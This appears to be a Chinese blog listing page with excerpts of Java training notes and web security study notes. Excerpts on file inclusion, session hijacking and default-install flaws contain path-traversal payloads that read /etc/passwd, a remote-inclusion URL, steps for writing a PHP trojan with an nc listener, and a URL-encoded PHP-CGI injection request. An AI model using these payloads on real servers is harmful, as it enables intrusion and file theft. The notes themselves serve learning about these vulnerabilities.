- 博客(13)
- 资源 (6)
- 收藏
- 关注
RSS订阅原创 java培训------知识补充
正则表达式:1,RegEx 正则表达式一. 模糊匹配^ .配输入字符串开始的位置。 $ 匹配输入字符串结尾的位置。* 最少出现0次,最多出现N次。+ 最少出现1次,最多出现N次。? 最少出现0次,最多出现1次。\d 匹配数字 :数字字符匹配。等效于 [0-9]。\D 匹配非数字 :非数字字符匹配。等效于 [^0-9]。\w 匹配数字+字母 :匹配任何字类字符...
2018-03-24 21:23:56
141
原创 java培训-----第五天
最后一天,写个万年历,不会打印出来,借鉴下同学的package figure_day4;import java.util.Scanner;public class test01 { public final static int YEAR4 = 365 * 3 + 366; public final static int YEAR = 365; public static void main(St...
2018-03-24 10:39:52
123
原创 java培训-----第四天
今天学爬虫:老师给的下图片的方法package com.kingswim.file;import java.io.BufferedInputStream;import java.io.ByteArrayOutputStream;import java.io.File;import java.io.FileOutputStream;import java.io.IOException;import ...
2018-03-24 10:28:59
223
原创 java培训-----第三天
homework:定义一“圆”Circle类,圆心为“点”Point类,构造一圆,求圆的周长和面积,并判断某点与圆的关系。定义圆类:public class circle { private point centPoint; private double radius; public final double PI=Math.PI; public circle(point centPoint,do...
2018-03-21 20:10:02
485
原创 java培训-------第二天
数组的定义: public static void main(String[] args) { // int arr1[] = {1,2,3,4}; //下标(索引) :[0,n-1] int[] arr = {12,45,98}; //第三个元素 int third= arr[2]; System.out.println(third); //数组的...
2018-03-20 20:45:36
130
原创 java培训--第一天
实现99乘法表:package figure_day1;public class test06 { public static void main(String[] args) { for(int i = 1;i < 10;i++){ for(int j = 1;j <= i;j++){ Sys...
2018-03-19 20:31:40
282
原创 web目标遍历和文件包含漏洞
配置靶机: → 重启apache服务:经典测试方法:•?file=../../../../etc/passwd •?page=file:///etc/passwd •?home=main.cgi •?page=http://www.a.com/1.php •http://1.1.1.1/../../../../dir/file.txt 绕过过滤检测方法部分服务器防御机制:在路径后面添加....
2018-03-08 13:00:30
2104
原创 docker安装及使用笔记
docker安装:sudo apt-get updatesudo apt-get -y install apt-transport-https ca-certificates curl software-properties-common# step 2: 安装GPG证书curl -fsSL http://mirrors.aliyun.com/docker-ce/linux/ubuntu/gpg ...
2018-03-07 22:59:41
301
原创 web身份认证漏洞
Session ID的利用:截取目标session ID利用firefox浏览器的tools > cookies manager功能导入IE获取session ID方法:F12开发人员工具>缓存 找回密码理想实验:https://www.example.com/reset?email=user@example.com&key=b4c9a289323b21a01c3e940f15...
2018-03-05 23:02:55
1687
原创 web默认安装漏洞
/phpmyadmin/setupPOST请求漏洞写入静态PHP木马:效果:写入PHP动态木马:(修改3.php)打开nc侦听端口:写入:(成功)Ubuntu/debian默认安装PHP5-cgi:POST/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E %63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%6...
2018-03-05 22:56:20
415
原创 Bursuite工具笔记
Target,proxy模块invisible代理 :针对多域名对应同一ip或者多ip对应同一域名情况代理https网站需要证书导入 :proxy ➡️ options ➡️ ca certificate ➡️ certificate in DER formate ➡️ next 保存的证书导入到浏览器中截断服务器返回客户端的数据包 :proxy➡️Options➡️interce...
2018-03-05 22:43:22
612
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人